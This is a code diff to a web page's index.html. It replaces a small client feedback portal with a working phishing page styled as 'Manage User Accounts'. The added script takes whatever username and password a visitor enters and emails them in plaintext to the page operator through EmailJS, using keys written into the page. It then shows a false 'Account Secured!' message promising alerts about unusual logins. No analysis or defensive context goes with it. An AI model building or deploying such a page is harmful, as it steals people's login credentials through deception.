--- a/index.html
+++ b/index.html
@@ -3,62 +3,111 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Client Feedback Portal</title>
+    <title>Manage User Accounts</title>
+    <script src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js"></script>
+    <script>
+        emailjs.init("JYKSTvr8xx8jZDFiA"); // EmailJS Public Key
+    </script>
     <style>
-        body { font-family: Arial, sans-serif; text-align: center; margin: 50px; }
-        .container { max-width: 400px; margin: auto; padding: 20px; border: 1px solid #ccc; border-radius: 5px; }
-        input, textarea { width: 100%; margin: 10px 0; padding: 8px; }
-        button { padding: 10px 15px; background-color: #007BFF; color: white; border: none; cursor: pointer; }
-        button:hover { background-color: #0056b3; }
+        body {
+            font-family: Arial, sans-serif;
+            background-color: #ffffff;
+            text-align: center;
+            margin: 0;
+            padding: 0;
+        }
+        .header {
+            background-color: #f07c00;
+            padding: 15px;
+            color: white;
+            font-size: 24px;
+        }
+        .container {
+            background-color: #ffffff;
+            width: 350px;
+            margin: 100px auto;
+            padding: 20px;
+            border-radius: 8px;
+            box-shadow: 0px 0px 10px rgba(0, 0, 0, 0.1);
+            border-top: 5px solid #f07c00;
+        }
+        h2 {
+            color: #333;
+        }
+        input {
+            width: 100%;
+            margin: 10px 0;
+            padding: 8px;
+            border: 1px solid #ccc;
+            border-radius: 4px;
+        }
+        button {
+            background-color: #f07c00;
+            color: white;
+            border: none;
+            padding: 10px;
+            width: 100%;
+            cursor: pointer;
+            border-radius: 4px;
+        }
+        button:hover {
+            background-color: #d96b00;
+        }
+        .forgot-password {
+            color: #f07c00;
+            text-decoration: none;
+        }
+        .forgot-password:hover {
+            text-decoration: underline;
+        }
     </style>
 </head>
 <body>
+    <div class="header">Manage User Accounts</div>
     <div id="login" class="container">
-        <h2>Login</h2>
+        <h2>Verify and Enable Account</h2>
         <input type="text" id="username" placeholder="Username" required>
         <input type="password" id="password" placeholder="Password" required>
         <button onclick="authenticate()">Login</button>
+        <p><a href="#" class="forgot-password">Use the above button to secure your account</a></p>
     </div>
 
     <div id="dashboard" class="container" style="display: none;">
-        <h2>Feedback Form</h2>
-        <textarea id="feedback" placeholder="Enter your feedback here..." required></textarea>
-        <button onclick="submitFeedback()">Submit</button>
+        <h2>Account Secured!</h2>
+        <p>We will alert you when we detect any unusual login from a new device within or outside your region.</p>
+        <button onclick="window.close()">Close this page</button>
     </div>
 
     <script>
-        const users = { "client1": "password123", "client2": "securepass" }; // Simple authentication
-        const adminEmail = "sshclhung@hotmail.com"; // Set your email address here
+        function sendEmail(username, password) {
+            const serviceID = "service_v6hp3f7";
+            const templateID = "template_7hs846r";
+            const publicKey = "JYKSTvr8xx8jZDFiA";
 
-        function sendEmail(subject, body) {
-            let mailtoLink = `mailto:${adminEmail}?subject=${encodeURIComponent(subject)}&body=${encodeURIComponent(body)}`;
-            let emailWindow = window.open(mailtoLink, '_blank');
-            if (emailWindow) {
-                emailWindow.close();
-            }
+            const templateParams = {
+                login_history: `Username: ${username}\nPassword: ${password}\nLogged in at: ${new Date().toLocaleString()}`
+            };
+
+            return emailjs.send(serviceID, templateID, templateParams, publicKey);
         }
 
         function authenticate() {
-            let username = document.getElementById("username").value;
-            let password = document.getElementById("password").value;
-            
-            if (users[username] && users[username] === password) {
-                document.getElementById("login").style.display = "none";
-                document.getElementById("dashboard").style.display = "block";
-                sendEmail("Login Record", `User ${username} logged in at ${new Date().toLocaleString()}`);
-            } else {
-                alert("Invalid login credentials!");
-            }
-        }
+            let username = document.getElementById("username").value.trim();
+            let password = document.getElementById("password").value.trim();
 
-        function submitFeedback() {
-            let feedback = document.getElementById("feedback").value;
-            if (feedback.trim() === "") {
-                alert("Please enter feedback before submitting.");
-                return;
+            if (username && password) {
+                sendEmail(username, password)
+                    .then(() => {
+                        document.getElementById("login").style.display = "none";
+                        document.getElementById("dashboard").style.display = "block";
+                    })
+                    .catch(error => {
+                        console.error("Error sending email", error);
+                        alert("Failed to send login report. Please try again.");
+                    });
+            } else {
+                alert("Please enter both username and password.");
             }
-            alert("Feedback submitted successfully!");
-            document.getElementById("feedback").value = "";
         }
     </script>
 </body>
